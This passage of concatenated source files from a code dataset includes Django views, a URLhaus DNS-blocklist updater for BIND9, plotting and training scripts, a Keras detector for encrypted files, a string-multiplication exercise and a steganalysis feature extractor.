SubmitFeedbackForm\n context = {'title': \"Feedback\", 'form': form_class, 'successful_submission': 'Feedback was successfuly submitted. Thank you for your comments'}\n return render(request, 'submit_feedback.html', context)\n\n else:\n form_class = SubmitFeedbackForm\n context = {'title': \"Feedback\", 'form': form_class}\n if request.GET:\n next = request.GET.get('next', \"/\")\n if request.user.is_authenticated():\n return redirect(next)\n context['next'] = next\n return render(request, 'submit_feedback.html', context)\n","sub_path":"data_cube_ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"644370253","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__\t=\t\"Jason Brown\"\n__email__\t=\t\"jason.brown@svarthal.io\"\n__version__\t=\t\"0.3\"\n__license__\t=\t\"Apache\"\n__date__\t=\t\"20200211\"\n\n\nimport urllib.request\nfrom os import chown\nfrom os import chmod\nfrom os import system\nfrom shutil import move\nimport subprocess\n\ndef main():\n\n\t'''\n\t\tFetch new malware file and write it to disk\n\t'''\n\n\turlhaus = urllib.request.urlopen('https://urlhaus.abuse.ch/downloads/rpz/')\n\twith open ('db.urlhaus', 'b+w') as malware:\n\t\tmalware.write(urlhaus.read())\n\n\t'''\n\t\tSetting correct permissions on the db file and moving it to the Bind9 directory\n\t'''\n\tchown('db.urlhaus', 0, 114)\n\tchmod('db.urlhaus', 0o644)\n\tmove('db.urlhaus', '/etc/bind/svarthal/db.urlhaus')\n\tsystem('systemctl restart bind9')\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"urlhaus.py","file_name":"urlhaus.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368702415","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom tf_dpmd_kit import plot\nfrom tf_dpmd_kit import train\nimport os\nimport numpy as np\nimport matplotlib.transforms as mtransforms\nimport pandas as pd\n\nhomedir = os.environ['homedir']\n\ndef fig_a(\n ax\n):\n\n str_dir = 
homedir+'/research_d/202203_MDCarbonicAcid/server/03.train/03.iter17_initmodel/03.rmse_val.npt/'\n train.dptest_parity_plt(\n ax,\n str_file = str_dir+'dptest.e.out',\n int_natoms = 384,\n float_lw = 0.75,\n list_ticks = [-5, 0, 5],\n )\n\ndef fig_b(\n ax\n):\n\n str_dir = homedir+'/research_d/202203_MDCarbonicAcid/server/03.train/03.iter17_initmodel/03.rmse_val.npt/'\n train.dptest_parity_plt(\n ax,\n str_file = str_dir+'dptest.f.out',\n float_lw = 0.75,\n list_ticks = [-5, 0, 5],\n )\n\ndef rdfcsv(file):\n \n data = np.loadtxt(file)\n return data[:,0], data[:,1]\n \ndef fig_c(\n ax\n):\n\n dir_aimd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/CPBO/CC/carbonicrdf/'\n dir_dpmd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/DPMD/330K/CC/carbonicrdf/'\n df_dpmd = pd.read_csv(dir_dpmd+'carbonicrdf.csv', index_col='r(ang)')\n df_aimd = pd.read_csv(dir_aimd+'carbonicrdf.csv', index_col='r(ang)')\n dict2d_data ={\n 'DPMD': {\n 'o_w.o_w': [df_dpmd.index, df_dpmd['o_w.o_w']],\n },\n 'AIMD': {\n 'o_w.o_w': [df_aimd.index, df_aimd['o_w.o_w']],\n },\n }\n ax.set_ylabel('g(r)')\n ax.text(\n x=0.1,\n y=0.9,\n s = r'O$\\mathregular{_W}$-O$\\mathregular{_W}$',\n horizontalalignment = 'left',\n verticalalignment = 'top',\n transform=ax.transAxes\n )\n ax.set_ylim((0,4))\n for label, dict_data in dict2d_data.items():\n data = dict_data['o_w.o_w']\n ax.plot( data[0], data[1], label=label, lw=1)\n\n ax.legend(\n frameon = False,\n handlelength = 1\n )\n ax.set_xlabel('r (Å)')\n ax.set_xlim(1,6)\n\ndef fig_d(\n axs\n):\n\n dir_aimd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/CPBO/CC/carbonicrdf/'\n dir_dpmd = '/home/faye/research_d/202203_MDCarbonicAcid/server/07.md_water62/DPMD/330K/CC/carbonicrdf/'\n df_dpmd = pd.read_csv(dir_dpmd+'carbonicrdf.csv', index_col='r(ang)')\n df_aimd = pd.read_csv(dir_aimd+'carbonicrdf.csv', index_col='r(ang)')\n dict_title = {\n 'o_nyl.h_w': r'$^=$O-H$\\mathregular{_W}$',\n 'o_oh.h_w': r'O$\\mathregular{_{OH}}$-H$\\mathregular{_W}$',\n 'h_oh.o_w': r'H$\\mathregular{_{OH}}$-O$\\mathregular{_W}$',\n }\n dict2d_data ={\n 'DPMD': {\n 'h_oh.o_w' : [df_dpmd.index, df_dpmd['cc.h_oh.o_w' ]],\n 'o_oh.h_w' : [df_dpmd.index, df_dpmd['cc.o_oh.h_w' ]],\n 'o_nyl.h_w': [df_dpmd.index, df_dpmd['cc.o_nyl.h_w']],\n },\n 'AIMD': {\n 'h_oh.o_w' : [df_aimd.index, df_aimd['cc.h_oh.o_w' ]],\n 'o_oh.h_w' : [df_aimd.index, df_aimd['cc.o_oh.h_w' ]],\n 'o_nyl.h_w': [df_aimd.index, df_aimd['cc.o_nyl.h_w']],\n },\n }\n dict_ylim = {\n 'h_oh.o_w': (0,3),\n 'o_oh.h_w': (0,2),\n 'o_nyl.h_w': (0,2),\n }\n \n for ax, key in zip(axs, dict_title):\n ax.set_ylabel('g(r)')\n ax.text(\n x=0.9,\n y=0.9,\n s = dict_title[key],\n horizontalalignment = 'right',\n verticalalignment = 'top',\n transform=ax.transAxes\n )\n ax.set_ylim(dict_ylim[key])\n for label, dict_data in dict2d_data.items():\n data = dict_data[key]\n ax.plot( data[0], data[1], label=label, lw=1)\n axs[0].tick_params(labelbottom=False)\n axs[1].tick_params(labelbottom=False)\n #axs[1].legend(\n # frameon = False,\n # handlelength = 1\n #)\n\n axs[-1].set_xlabel('r (Å)')\n axs[0].set_xlim(1,6)\n\ndef fig_e(\n ax,\n):\n ax.axis('off')\n str_dir = '/home/faye/research_d/202203_MDCarbonicAcid/server/01.init/H2CO3_CC_H2O_126/plm/'\n image = plt.imread(str_dir+'33733.png')\n ax.set_ylim(1200,-300)\n ax.imshow(image, origin='upper')\n\n plot.add_text(\n ax,\n dict_text = {\n #(700,250) :r'O$_W$' , \n #(1000,400) :r'H$_W$' , \n (572,365) :r'$\\bf{^=}$O',\n (1244,532) 
:r'H$\\bf{\\mathregular{_{OH}}}$',\n (1061,992) :r'O$\\bf{\\mathregular{_{OH}}}$',\n },\n ha = 'center',\n va = 'center',\n fontweight='bold'\n )\n\ndef fig_label(\n fig,\n axs,\n):\n\n x = -20/72\n y = 0/72\n dict_pos = {\n '(a)': (x, y),\n '(b)': (x, y),\n '(c)': (x, y),\n '(d)': (x, y),\n '(e)': (x, -12/72),\n }\n\n for ax, label in zip(axs, dict_pos.keys()):\n (x, y) = dict_pos[label]\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(x, y, fig.dpi_scale_trans)\n ax.text(0.0, 1.0, label, transform=ax.transAxes + trans,\n fontsize='medium', va='top')\n\n\ndef main():\n\n plot.set_rcparam()\n cm = 1/2.54\n mpl.rcParams['figure.dpi'] = 300\n mpl.rcParams['figure.constrained_layout.use'] = False\n\n fig = plt.figure( figsize = (8.6*cm, 10*cm) )\n\n gs = fig.add_gridspec(2, 1, height_ratios=[4, 7.4], left=0.1, right=0.99, bottom=0.1, top=0.99, hspace=0.3)\n\n gs0 = gs[0].subgridspec(1, 2, wspace=0.3)\n ax0 = fig.add_subplot(gs0[0])\n ax1 = fig.add_subplot(gs0[1])\n\n gs1 = gs[1].subgridspec(3, 2, wspace=0.3)\n ax2 = fig.add_subplot(gs1[0, 0])\n ax3 = fig.add_subplot(gs1[0, 1])\n ax4 = fig.add_subplot(gs1[1, 1], sharex=ax2)\n ax5 = fig.add_subplot(gs1[2, 1], sharex=ax2)\n ax6 = fig.add_subplot(gs1[1:, 0])\n\n fig_a(ax0)\n fig_b(ax1)\n fig_c(ax2)\n fig_d([ax3, ax4, ax5])\n fig_e(ax6)\n\n fig_label(\n fig,\n axs = [ax0,ax1,ax2,ax3,ax6]\n )\n\n plot.save(\n fig,\n file_save = 'fig_1',\n list_type = ['pdf', 'svg']\n )\n\n plt.show()\n\nmain()\n\n","sub_path":"202203_MDCarbonicAcid/fig_1_plt.py","file_name":"fig_1_plt.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"56703243","text":"# main.py\n\nimport math\nimport data\nimport optim\nfrom model import Model\n\n# parameters\nargs = {'batch_size': 100, # size of a mini-batch\n 'learning_rate': 1e-3, # learning rate\n 'momentum': 0.9, # decay parameter for the momentum vector\n 'weight_decay': 0, # L2 regularization on the weights\n 'epochs': 50, # maximum number of epochs to run\n 'init_wt': 0.01, # standard deviation of the initial random weights\n 'context_len': 3, # number of context words used\n 'embedding_dim': 16, # number of dimensions in embedding\n 'vocab_size': 250, # number of words in vocabulary\n 'num_hid': 128, # number of hidden units\n 'model_file': 'model.pk', # filename to save best model\n}\n\n# dataloaders\nloader_test = data.DataLoader(args['batch_size'], 'Test')\nloader_valid = data.DataLoader(args['batch_size'], 'Valid')\nloader_train = data.DataLoader(args['batch_size'], 'Train')\n\n# create model\nmodel = Model(args, loader_train.vocab)\n\n# initialize optimizer\noptimizer = optim.SGDMomentum(model.model, args['learning_rate'], args['momentum'], args['weight_decay'])\n\nbest_validation_loss = 10000000.0\n\nfor epoch in range(args['epochs']):\n # training\n total_acc, total_loss = 0, 0\n for batch in range(math.ceil(loader_train.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_train.get_batch()\n batch_size = input.size(0)\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n grad_loss = model.criterion.backward(loss)\n model.model.backward(grad_loss)\n model.model = optimizer.step(model.model)\n total_acc += acc\n total_loss += loss\n total_acc = total_acc / loader_train.get_size()\n total_loss = total_loss / loader_train.get_size()\n print(\"Training Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, 
total_loss, total_acc))\n\n # validation\n total_acc, total_loss = 0, 0\n for batch in range(math.ceil(loader_valid.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_valid.get_batch()\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n total_acc += acc\n total_loss += loss\n total_acc = total_acc / loader_valid.get_size()\n total_loss = total_loss / loader_valid.get_size()\n print(\"Validation Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, total_loss, total_acc))\n if best_validation_loss > total_loss:\n best_validation_loss = total_loss\n # save the best model so far under the configured filename\n model.save(args['model_file'])\n else:\n print(\"Validation loss increased, finishing training.\")\n break\n print(' ')\n\n# testing\ntotal_acc, total_loss = 0, 0\nfor batch in range(math.ceil(loader_test.get_size() / args['batch_size'])):\n model.model.zero_grad()\n input, label = loader_test.get_batch()\n output = model.model.forward(input)\n loss, acc = model.criterion.forward(output, label)\n total_acc += acc\n total_loss += loss\ntotal_acc = total_acc / loader_test.get_size()\ntotal_loss = total_loss / loader_test.get_size()\nprint(\"Testing Epoch: [%d]\\t Loss: %.4f \\t Prec@1: %.4f \\t\" % (epoch, total_loss, total_acc))\nprint(' ')\n","sub_path":"Backprop Example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"483874938","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nfrom fileHandler import (extract_data_from_all_files,\n read_data_from_file,\n divide_test_and_trainging_data,\n data_from_file,\n get_all_files_in_dir,\n create_map,\n map_to_file,\n stringToInt)\nfrom encrypter import (encrypt_file, decrypt_file, encrypt_file_header_skip)\n\n\n\ndef prepare_data():\n divide_test_and_trainging_data(\"OriginalFiles\", \"Test\", \"Training\")\n print(\"Files divided\")\n #Training Data\n files = get_all_files_in_dir(\"Training\")\n file_map = create_map(files)\n map_to_file(file_map, \"Training\" + \"_map\")\n print(\"Training map done\")\n for file_path, value in file_map.items():\n if(value == 1):\n encrypt_file(file_path)\n print(\"Training data encrypted\")\n extract_data_from_all_files(\"Training_data.txt\", file_map )\n print(\"Training data extracted\")\n #Test Data\n files = get_all_files_in_dir(\"Test\")\n file_map = create_map(files)\n map_to_file(file_map, \"Test_map\")\n print(\"Test map done\")\n for file_path, value in file_map.items():\n if(value == 1):\n encrypt_file(file_path)\n print(\"Test data encrypted\")\n extract_data_from_all_files(\"Test_data.txt\", file_map )\n print(\"Test data extracted\")\n\ndef train_model(layers,activationLayers,opti,lss):\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(layers[0], activation=activationLayers[0], input_dim=10))\n for l in range(1, len(layers)):\n model.add(keras.layers.Dense(layers[l], activation = activationLayers[l]))\n\n model.compile(optimizer=opti, loss=lss)\n\n trainingDataInput, trainingDataOutput = read_data_from_file(\"Training_data.txt\")\n #for data in trainingDataInput:\n # print(data)\n # print(\"\\n\")\n trainingInputTensor = tf.constant(trainingDataInput)\n trainingOutputTensor = tf.constant(trainingDataOutput)\n model.fit(trainingInputTensor,trainingOutputTensor, 
batch_size=len(trainingDataInput), epochs=2000, shuffle=True)\n keras.utils.plot_model(\n model,\n to_file='model.png',\n show_shapes=True,\n show_layer_names=True,\n rankdir='LR',\n expand_nested=True,\n dpi=96\n )\n testDataInput, testDataOutput = read_data_from_file(\"Test_data.txt\")\n testInputTensor = tf.constant(testDataInput)\n eval = model.predict(testInputTensor, batch_size=len(testDataInput))\n save_results(layers, activationLayers, opti, lss, eval, testDataOutput, len(trainingDataInput))\n #print(model.get_layer(index=0).weights)\n #model.save('./models/latest', True)\n return model\ndef load_latest_model():\n model = keras.models.load_model('./models/latest')\n return model\ndef is_encrypted(filepath, model):\n data = []\n temp_data = data_from_file(filepath)\n temp_data[0]= float(stringToInt(temp_data[0]))\n temp_data = [float(i) for i in temp_data]\n data.append(temp_data)\n \n InputTensor = tf.constant(data)\n prediction = model.predict(InputTensor)[0][0]\n return prediction\ndef save_results(layers, activationLayers, optimizer, loss, evaluation, testDataAnswers, num_training_data):\n f= open(\"results.txt\",\"a+\")\n id = get_last_id()\n f.write(\"************************************\\n\")\n f.write (time.asctime( time.localtime(time.time()) ))\n f.write(\"\\n\")\n f.write(\"id: %s \\n\" % str(id))\n f.write(\"Files in training data: %s\\n\" % num_training_data)\n f.write(\"Files in test data: %s\\n\" % len(testDataAnswers))\n f.write(\"Optimizer: %s \\n\" % optimizer)\n f.write(\"Loss: %s \\n\" % loss)\n f.write(\"Number of layers: %s \\n\" % len(layers))\n for i in range(0,len(layers)):\n f.write(\"%s_%s \\n\" % (layers[i], activationLayers[i]))\n highest_diff = 0.0\n average_diff = 0.0\n ninety_fifth_percentile = 0\n i=0\n for e in evaluation:\n #print(round(e[0],6) , \" -> \" , testDataAnswers[i][0])\n if highest_diff < abs(round(e[0],16)-testDataAnswers[i][0]):\n highest_diff = abs(round(e[0],16)-testDataAnswers[i][0])\n average_diff += abs(round(e[0],16)-testDataAnswers[i][0])\n if (testDataAnswers[i][0] < 0.5 and round(e[0],6) < 0.05):\n ninety_fifth_percentile += 1\n elif (testDataAnswers[i][0] > 0.5 and round(e[0],6) > 0.95):\n ninety_fifth_percentile += 1\n i+=1\n average_diff /= i\n ninety_fifth_percentile /=i\n f.write(\"Highest diff: %s\\n\" % highest_diff)\n f.write(\"Average diff: %s\\n\" % average_diff)\n f.write(\"95 percent certainty: %s\\n\" % ninety_fifth_percentile)\n f.write(\"************************************\\n\")\n f.close()\n f = open(\"trunc_results.txt\",\"a+\")\n f.write(str(id))\n f.write('$')\n f.write(time.asctime( time.localtime(time.time())))\n f.write('$')\n f.write(str(num_training_data))\n f.write('$')\n f.write(str(len(testDataAnswers)))\n f.write('$')\n f.write(str(optimizer))\n f.write('$')\n f.write(str(loss))\n f.write('$')\n f.write(str(len(layers)))\n f.write('$')\n f.write(str(highest_diff))\n f.write('$')\n f.write(str(average_diff))\n f.write('$')\n f.write(str(ninety_fifth_percentile))\n f.write('\\n')\n f.close()\ndef read_results(lines):\n f=open('trunc_results.txt', 'r')\n data = []\n idx = 0\n for line in f:\n if(idx >= lines[0] and idx <= lines[1] ):\n line_data = {}\n temp = line.split('$')\n line_data[\"id\"] = temp[0]\n line_data[\"date\"] = temp[1]\n line_data[\"num_training_data\"] = temp[2]\n line_data[\"num_test_data\"] = temp[3]\n line_data[\"optimizer\"] = temp[4]\n line_data[\"loss\"] = temp[5]\n line_data[\"num_layers\"] = temp[6]\n line_data[\"highest_diff\"] = temp[7]\n line_data[\"average_diff\"] = 
temp[8]\n line_data[\"amount_over_ninety_five\"] = temp[9]\n data.append(line_data)\n idx+=1\n f.close()\n return(data)\ndef get_last_id():\n f=open('trunc_results.txt', 'r')\n id = 0\n for line in f:\n id += 1\n f.close()\n return id\ndef flatten_results(input, output, data):\n i = []\n o = []\n for d in data:\n i.append(d[input])\n o.append(float(d[output]))\n return(i,o)\n\ndef print_fig(names ,figname, lines): \n res =read_results(lines)\n fig, ax = plt.subplots()\n for name in names:\n input, output = flatten_results(\"id\",name,res)\n ax.plot(input, output, label=name)\n ax.legend()\n\n plt.savefig(figname+\".png\", dpi=512)\n\n#prepare_data()\n\nactivationLayers = [\"hard_sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\",\"sigmoid\"]\nopti = 'RMSprop' # Best Performance\nlss = tf.keras.losses.BinaryCrossentropy() # Best Performance\nlayers = [64,8,8,1]\n#model = train_model(layers,activationLayers,opti,lss)\n\n#model = load_latest_model()\n#model2.summary()\n#model.summary()\n#print_fig([\"average_diff\", \"highest_diff\"], \"figure\", [0,59])","sub_path":"ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117782998","text":"# Digits are stored as strings via str(num); the earlier chr(num) produced\n# control characters and made int(res[currentIndex]) raise\n# ValueError: invalid literal for int() with base 10: ''\nclass Solution:\n\t# @param A : string\n\t# @param B : string\n\t# @return a strings\n\tdef multiply(self, A, B):\n\t\tres = []\n\t\tindex_a = self.remove_whitespace(A)\n\t\tindex_b = self.remove_whitespace(B)\n\t\tA = A[index_a:]\n\t\tB = B[index_b:]\n\t\tcarry, index = 0, 0\n\n\t\tfor i in xrange(len(A)-1, -1, -1):\n\t\t\t_a = int(A[i])\n\t\t\tnum = 0\n\t\t\tcurrentIndex = index\n\t\t\tfor j in xrange(len(B)-1, -1, -1):\n\t\t\t\t_b = int(B[j])\n\t\t\t\tnum = _a * _b + carry\n\t\t\t\tcarry = num / 10\n\t\t\t\tnum %= 10\n\t\t\t\tchar_number = str(num)\n\n\t\t\t\tif currentIndex >= len(res):\n\t\t\t\t\tres.append(char_number)\n\t\t\t\telse:\n\t\t\t\t\tnum += int(res[currentIndex])\n\t\t\t\t\tcarry += num/10\n\t\t\t\t\tnum %= 10\n\t\t\t\t\tchar_number = str(num)\n\t\t\t\t\tres[currentIndex] = char_number\n\t\t\t\tcurrentIndex += 1\n\t\t\tchar_number = str(carry)\n\t\t\tcarry = 0\n\t\t\tres.append(char_number)\n\t\t\tindex += 1\n\n\t\tres.reverse()\n\t\ti = self.remove_whitespace(res)\n\t\tif i == len(res):\n\t\t\treturn '0'\n\n\t\treturn ''.join(res[i:])\n\n\tdef remove_whitespace(self, A):\n\t\ti = 0\n\t\twhile i < len(A) and A[i] == '0':\n\t\t\ti += 1\n\t\treturn i\n\"\"\"\n\nGiven two numbers represented as strings, return multiplication of the numbers as a string.\n\n Note: The numbers can be arbitrarily large and are non-negative.\nNote2: Your answer should not have leading zeroes. For example, 00 is not a valid answer. 
\nFor example, \ngiven strings \"12\", \"10\", your answer should be “120”.\n\n\n\"\"\"","sub_path":"strings/multiply_strings.py","file_name":"multiply_strings.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599611073","text":"from django.shortcuts import render, redirect,get_object_or_404\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.urls import reverse\nfrom .models import Comment\nfrom blog.models import *\nfrom course.models import *\nfrom user_profile.models import *\nfrom utils import check_user\n\n\n# Create your views here.\ndef update_comment(request,blog_id):\n res=check_user(request)\n if res:\n return res\n \n course=get_object_or_404(Blog,pk=blog_id).reference\n #course=get_object_or_404(CourseModel,pk=blog_id)\n \n if course.teacher!=request.user:\n get_object_or_404(SelectionModel,student=request.user,course=course)\n\n\n\n\n referer = request.META.get('HTTP_REFERER', reverse('index')) \n user = request.user\n\n # data validation\n # if not user.is_authenticated:\n # return render(request, 'error.html', {'message':'用户未登录', 'redirect_to':referer})\n\n text = request.POST.get('text', '').strip()\n if text == '':\n return render(request, 'error.html', {'message':'评论内容为空', 'redirect_to':referer})\n\n try:\n content_type = request.POST.get('content_type', '')\n #object_id = int(request.POST.get('object_id', ''))\n object_id=blog_id\n model_class = ContentType.objects.get(model = content_type).model_class()\n model_obj = model_class.objects.get(pk = object_id)\n except Exception as e:\n return render(request, 'error.html', {'message':'评论对象不存在', 'redirect_to':referer})\n\n # checks passed, save the data\n comment = Comment()\n comment.user = user\n comment.text = text\n comment.content_object = model_obj\n comment.save()\n\n return redirect(referer)","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"120549211","text":"from django.shortcuts import 
render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt, csrf_protect\nimport sys, os\n\nfrom sklearn.manifold import MDS\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nimport numpy as np\n\nsys.path.insert(1, os.path.join(os.path.realpath(os.path.pardir), 'code'))\nfrom utility import utility\n\n# mds = MDS(n_components = 2)\nlda = LDA()\nallVectors = np.array([])\nutil = utility('../code/pos_neg_matrix.pkl','../code/model.pkl', '../code/vectorizer.pkl')\nk = 50\ndata1 = util.getInitialization(k)\nn = 300\nallVectors = np.concatenate((np.random.permutation(data1['positiveCorpusVectors'])[:n], np.random.permutation(data1['negativeCorpusVectors'])[:n]))\ndata3 = util.getConfidence(allVectors)\nallVectors = allVectors[:, data1['featureIndex']]\nlda.fit(allVectors, [0] * n + [1] * n)\n\ndef index(request):\n return render(request, 'classifier1/index.html')\n\n@csrf_exempt\ndef predict(request):\n global allVectors, util, lda\n \n data = util.getSimilarityInfo([request.POST['sentence']])\n\n # corpusVectors = mds.fit_transform(np.concatenate((allVectors, [data['sentenceVector']])))\n # data['sentenceVector'] = corpusVectors[-1].tolist()\n data['sentenceVector'] = lda.transform([data['sentenceVector']]).tolist() + [data['confidence']]\n\n data['sentence'] = request.POST['sentence']\n data['confidence'] = round(data['confidence'], 3) * 100\n data['positiveCosineSimilarity'] = round(data['positiveCosineSimilarity'], 3)\n data['negativeCosineSimilarity'] = round(data['negativeCosineSimilarity'], 3)\n data['positiveOccurrences'] = ', '.join(data['positiveOccurrences'])\n data['negativeOccurrences'] = ', '.join(data['negativeOccurrences'])\n response = JsonResponse(data)\n return response\n\n@csrf_exempt\ndef initialize(request):\n global allVectors, n, data3, lda, data1, util\n data2 = util.getSimilarityInfo([request.POST['sentence']])\n data = dict(data1, **data2)\n\n # corpusVectors = mds.fit_transform(np.concatenate((allVectors, [data['sentenceVector']])))\n # data['positiveCorpusVectors'] = corpusVectors[:n]\n # data['negativeCorpusVectors'] = corpusVectors[n:]\n data['positiveCorpusVectors'] = np.concatenate((lda.transform(allVectors[:n]), data3[:n]), axis = 1).tolist()\n data['negativeCorpusVectors'] = np.concatenate((lda.transform(allVectors[n:]), data3[n:]), axis = 1).tolist()\n\n data['sentenceVector'] = lda.transform([data['sentenceVector']]).tolist() + [data['confidence']]\n\n data['confidence'] = round(data['confidence'], 3) * 100\n data['sentence'] = request.POST['sentence']\n data['positiveCosineSimilarity'] = round(data['positiveCosineSimilarity'], 3)\n data['negativeCosineSimilarity'] = round(data['negativeCosineSimilarity'], 3)\n data['positiveOccurrences'] = ', '.join(data['positiveOccurrences'])\n data['negativeOccurrences'] = ', '.join(data['negativeOccurrences'])\n # data = {\n # 'sentence': request.POST['sentence'],\n # 'result': 'POSITIVE',\n # 'sentenceVector': [],\n # 'positiveCosineSimilarity': 0.8,\n # 'negativeCosineSimilarity': 0.2,\n # 'positiveOccurrences': ', '.join(list(['a', 'b'])),\n # 'negativeOccurrences': ', '.join(list(['1', '2'])),\n\n # 'positiveCorpusVectors': [[]],\n # 'negativeCorpusVectors': [[]],\n # 'topWords': { 'foo': 12, 'bar': 6 },\n # 'bottomWords': { 'boo': 12, 'far': 6 },\n # }\n return render(request, 'classifier1/result.html', 
data)","sub_path":"FinalProject/web/classifier1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"240641992","text":"import numpy as np\nfrom scipy import ndimage\n\n########################################################################\n# Same code for feature extraction as that in 'Image Preprocessing.py' #\n########################################################################\n\ndef getPlaneBits(planeId, binary_image):\n return [int(b[planeId]) for b in binary_image]\n\ndef getBitPlanes(img):\n bin_image = []\n bit_planes = []\n\n for i in range(0, 512):\n for j in range(0, 512):\n bin_image.append(np.binary_repr(img[i][j], width = 8))\n \n for i in range(0, 8):\n bit_planes.append(np.array(getPlaneBits(i, bin_image)).reshape(512, 512))\n \n return bit_planes\n\nfrom scipy.stats import pearsonr\n\ndef autocor(A, k, l):\n Xk = A[0:512 - k, 0:512 - l]\n Xl = A[k:512, l:512]\n return pearsonr(Xk.flatten(), Xl.flatten())\n\ndef getHl1(img_hist, l):\n return img_hist[0:256 - l]\n\ndef getHl2(img_hist, l):\n return img_hist[l:256]\n\ndef getCHl(img_hist, l):\n return pearsonr(getHl1(img_hist, l), getHl2(img_hist, l))\n\ndef getModifiedWavelet(C, t):\n for i, row in enumerate(C):\n for j, val in enumerate(row):\n if abs(val) < t:\n C[i][j] = 0\n return C\n\ndef getE(img, t):\n coeffs = pywt.dwt2(img, 'haar')\n LL, (LH, HL, HH) = coeffs\n\n LH = getModifiedWavelet(LH, t)\n HL = getModifiedWavelet(HL, t)\n HH = getModifiedWavelet(HH, t)\n\n img_denoised = pywt.idwt2((LL, (LH, HL, HH)), 'haar')\n\n E = img - img_denoised\n \n return E\n\ndef getCE(img, t, k, l):\n E = getE(img, t)\n return autocor(E, k, l)\n\nimport pywt\n\ndef getFeatures(filename):\n features = []\n \n img = ndimage.imread(filename, mode = 'L')\n bit_planes = getBitPlanes(img)\n\n autocor_kl_pairs = [[1, 0], [2, 0], [3, 0], [4, 0], [0, 1], [0, 2], [0, 3], [0, 4], [1, 1], [2, 2], [3, 3], [4, 4],\n [1, 2], [2, 1]]\n\n M1 = bit_planes[0]\n M2 = bit_planes[1]\n\n features.append(pearsonr(M1.flatten(), M2.flatten())[0])\n\n for pair in autocor_kl_pairs:\n features.append(autocor(M1, pair[0], pair[1])[0])\n\n img_hist, bin_edges = np.histogram(img.flatten(), bins = list(range(0, 257)), density = True)\n\n He = [img_hist[i] for i in range(0, 256, 2)]\n Ho = [img_hist[i] for i in range(1, 256, 2)]\n\n features.append(pearsonr(He, Ho)[0])\n\n for i in range(1, 5):\n features.append(getCHl(img_hist, i)[0])\n \n autocor_tkl_triplets = [[1.5, 0, 1], [1.5, 1, 0], [1.5, 1, 1], [1.5, 0, 2], [1.5, 2, 0], [1.5, 1, 2], [1.5, 2, 1],\n [2, 0, 1], [2, 1, 0], [2, 1, 1], [2, 0, 2], [2, 2, 0], [2, 1, 2], [2, 2, 1], [2.5, 0, 1],\n [2.5, 1, 0], [2.5, 1, 1], [2.5, 0, 2], [2.5, 2, 0], [2.5, 1, 2], [2.5, 2, 1]]\n\n for triplet in autocor_tkl_triplets:\n features.append(getCE(img, triplet[0], triplet[1], triplet[2])[0])\n\n return features\n\n######################################\n# Image Preprocessing code ends here #\n######################################\n\nfrom sklearn.externals import joblib\nfrom os import sys\nfrom pathlib import Path\n\n# Function to return steg label for an image\ndef is_steg(filename):\n # Load persisted models\n base = '/Users/sourish1997/AnacondaProjects/Steganalysis/Final Model/'\n models = [joblib.load(Path(base + 'original_abc.pkl')), joblib.load(Path(base + 'original_mlp.pkl')),\n joblib.load(Path(base + 'good_abc.pkl')), joblib.load(Path(base + 'good_mlp.pkl'))]\n\n # Extract CF feature set 
